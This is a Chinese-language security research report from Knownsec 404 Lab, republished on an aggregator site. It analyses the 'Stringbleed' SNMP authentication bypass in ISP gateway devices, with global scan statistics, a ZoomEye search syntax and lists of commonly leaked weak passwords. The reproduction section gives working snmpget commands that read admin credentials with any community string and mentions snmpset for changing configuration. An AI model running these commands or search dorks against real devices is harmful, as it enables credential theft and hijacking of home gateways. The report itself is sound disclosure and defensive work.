作者：知道創(chuàng)宇404實驗室

1. 更新情況

2. 事件概述

SNMP協(xié)議[1]，即簡單網(wǎng)絡(luò)管理協(xié)議（SNMP，Simple Network Management Protocol），默認(rèn)端口為 161/UDP，目前一共有3個版本：V1，V2c，V3。V3是最新的版本，在安全的設(shè)計上有了很大改進(jìn)，不過目前廣泛應(yīng)用的還是存在較多安全問題的V1和V2c版本。SNMP協(xié)議工作的原理簡單點來說就是管理主機(jī)向被管理的主機(jī)或設(shè)備發(fā)送一個請求，這個請求包含一個community和一個oid。oid就是一個代號，代表管理主機(jī)這個請求想要的信息。被管理的主機(jī)收到這個請求后，看請求community是否和自己保存的一致，如果一致，則把相應(yīng)信息返回給管理主機(jī)。如果不一致，就不會返回任何信息。所以community相當(dāng)與一個認(rèn)證的口令。V1和V2c版本的SNMP協(xié)議都是明文傳輸數(shù)據(jù)的，所以可以通過抓包嗅探等手段獲取認(rèn)證需要的community。

2018年12月25日，Seebug 平臺收錄了多個基于SNMP協(xié)議的敏感信息泄露漏洞[2]。在多種廠商提供的網(wǎng)關(guān)類設(shè)備中，可以使用任意 community非常容易地讀取SNMP提供的明文形式的的Web管理系統(tǒng)的用戶名和密碼、Wi-Fi憑證等信息。也可以使用任意community通過SET協(xié)議指令發(fā)送配置更新或控制請求，攻擊者可以注入惡意的配置，如在Cisco DPC3928SL通過注入SSID造成Web管理系統(tǒng)的XSS（CVE-2018-20379）。

該漏洞最早于 2017 年 4 月 4 日曝出，CVE編號為CVE-2017-5135，漏洞發(fā)現(xiàn)者將該漏洞稱之為 Stringbleed[3]。2018年12月22日，時隔一年多，漏洞發(fā)現(xiàn)者進(jìn)行全球探測后提供了一個很全的漏洞影響列表，其中包含23個不同廠商78個不同型號的網(wǎng)關(guān)設(shè)備，同時申請了多個CVE編號（CVE-2018-20380～CVE-2018-20401）。關(guān)于漏洞的成因一直都在爭論之中，截止目前依然沒有最終定論[4]。該類設(shè)備一般由ISP提供，我們暫時沒有找到漏洞設(shè)備或固件對漏洞原理進(jìn)行研究。根據(jù)社區(qū)的討論結(jié)果，產(chǎn)生該漏洞的原因可能有以下幾種情況：

• 這些存在漏洞的設(shè)備使用了同一個存在邏輯缺陷的SNMP協(xié)議實現(xiàn)，該實現(xiàn)代碼沒有正確處理 community 字符串認(rèn)證，導(dǎo)致任意 community 均可以通過認(rèn)證，進(jìn)一步導(dǎo)致敏感信息泄露。
• ISP 配置錯誤，無效的訪問控制規(guī)則。

本文不包含漏洞分析，而是針對全球該類設(shè)備漏洞存在情況的數(shù)據(jù)分析報告。

3. 漏洞復(fù)現(xiàn)

直接使用 snmpget 命令發(fā)送 SNMP GET 請求即可， -c 選項指定任意字符串作為 community 均可通過認(rèn)證。

snmpget -v 1 -c public $IP iso.3.6.1.2.1.1.1.0 snmpget -v 1 -c '#Stringbleed' $IP iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 snmpget -v 1 -c '#Stringbleed' $IP iso.3.6.1.4.1.4491.2.4.1.1.6.1.2.0

復(fù)現(xiàn)結(jié)果如下：

如果目標(biāo)設(shè)備開放了Web服務(wù)，則可使用泄露的用戶名和密碼登陸Web管理系統(tǒng)，如下：

值得一提的是，用戶名和密碼存在為空的情況。

發(fā)送 SNMP SET 請求進(jìn)行配置更新，-c 選項指定任意 community。如下所示，我們通過snmpset修改了 Web 系統(tǒng)用戶名。

4. 漏洞影響范圍

我們通過提取漏洞設(shè)備相關(guān)的“關(guān)鍵詞”，在ZoomEye網(wǎng)絡(luò)空間搜索引擎[5]上共發(fā)現(xiàn)了1,241,510個 IP數(shù)據(jù)。

通過使用 zmap 對這 124 萬的IP數(shù)據(jù)進(jìn)行存活檢測，發(fā)現(xiàn)約有 23 萬的IP 存活。進(jìn)一步對存活的 23 萬IP進(jìn)行漏洞存在檢驗，發(fā)現(xiàn)有15882 個目標(biāo)設(shè)備存在該敏感信息泄露漏洞，涉及23個廠商的多個型號設(shè)備的多個固件版本。

對這 15882 個漏洞設(shè)備的信息進(jìn)行聚合，得到廠商及版本等統(tǒng)計信息如下（各個型號的ZoomEye dork 為: Vendor +Model +相應(yīng)型號，如搜索DPC3928SL的語法為：Vendor +Model +DPC3928SL）

漏洞設(shè)備的廠商分布餅圖如下（有一點需要說明的是，DPC3928SL網(wǎng)關(guān)設(shè)備屬于受此漏洞影響最嚴(yán)重的網(wǎng)絡(luò)設(shè)備之一，原來屬于Cisco公司， 現(xiàn)在屬于Technicolor。）

國家分布前十如下，主要分布在中國、泰國、韓國等國家。

中國存在漏洞的設(shè)備全部分布在廣東、臺灣兩個省份，呈現(xiàn)一定的地域性。其中廣東最多，為6318 臺。

進(jìn)一步分析發(fā)現(xiàn)，在原全球124萬161/udp 端口的該類設(shè)備IP數(shù)據(jù)中，屬于中國的幾乎全部分布在廣東省和臺灣省，其他省份基本上沒有探測到公網(wǎng)上該類設(shè)備端口開放（運營商禁用了SNMP服務(wù)或者沒有使用同類設(shè)備？）。

廣東省受影響的設(shè)備的ISP分布如下，98% 以上歸屬于 “珠江寬頻/聯(lián)通“ 這個ISP，存在漏洞的設(shè)備大部分為Technicolor CWA0101 Wireless Gateway ，version ：gz5.0.2。

臺灣的181臺漏洞設(shè)備都?xì)w屬于ISP：http://twmbroadband.com，存在漏洞的設(shè)備大部分為Ambit T60C926。結(jié)合以上數(shù)據(jù)分析，我們斷定中國存在該漏洞設(shè)備的地理分布和當(dāng)?shù)氐腎SP有很大關(guān)系。

針對所有存在該漏洞的設(shè)備，我們統(tǒng)計了憑證的使用情況，如下：

常用用戶名，主要包含admin、login、user、dlink等。

常用密碼，主要包含 admin、password、dream01、空、br0adband、gzcatvnet、user、Broadcom、dlink、ambit、root等，大部分為常見的弱密碼。

非常有意思的是，我們發(fā)現(xiàn)以下使用次數(shù)最多的用戶名密碼組合，和使用該憑證組合最多的漏洞設(shè)備，以及漏洞設(shè)備所在的國家，都存在一定的關(guān)聯(lián)性。

（如第一行記錄：中國所有含有該漏洞的設(shè)備中約有 5502 臺都使用了 admin:admin 憑證，且受影響設(shè)備型號數(shù)量最多的為 Technicolor/CWA0101。）

5. 總結(jié)

基本可以肯定的是，這不是SNMP協(xié)議本身的問題，而是協(xié)議的實現(xiàn)代碼存在漏洞或者ISP配置錯誤。該漏洞影響廠商、設(shè)備型號非常多，且呈現(xiàn)出一定的區(qū)域性。

路由器、Modem、攝像頭等IoT設(shè)備的信息泄露漏洞層出不窮，對個人隱私造成極大的威脅，關(guān)閉非必要的端口或者使用防火墻限制非法訪問是個值得考慮的舉措。

系統(tǒng)的安全性往往取決于最短的那塊木板-“木桶效應(yīng)”，通過SNMP協(xié)議泄露HTTP服務(wù)憑證很好的說明了這一點。

用戶可根據(jù)PoC自行驗證設(shè)備是否存在漏洞，如果存在漏洞可聯(lián)系相應(yīng)的ISP尋求解決方案。

6. 相關(guān)鏈接

[1] SNMP 協(xié)議https://baike.baidu.com/item/SNMP/133378?fr=aladdin

[2] Seebug 漏洞收錄https://www.seebug.org/vuldb/ssvid-97741https://www.seebug.org/vuldb/ssvid-97742https://www.seebug.org/vuldb/ssvid-97736

[3] Stringbleed
https://stringbleed.github.io/#

[4] 關(guān)于該漏洞的討論https://www.reddit.com/r/netsec/comments/67qt6u/cve_20175135_snmp_authentication_bypass/

[5] ZoomEye網(wǎng)絡(luò)空間搜索引擎https://www.zoomeye.org/searchResult?q=MODEL%20%2BVENDOR%20%2Bport%3A%22161%22

[6] SNMP 歷史漏洞參考http://drops.the404.me/1033.html

---

本文由 Seebug Paper 發(fā)布，如需轉(zhuǎn)載請注明來源。

歡迎關(guān)注我和專欄，我將定期搬運技術(shù)文章～

也歡迎訪問我們：知道創(chuàng)宇云安全

總結(jié)

以上是生活随笔為你收集整理的配置snmp_多种设备基于 SNMP 协议的敏感信息泄露漏洞数据分析报告的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。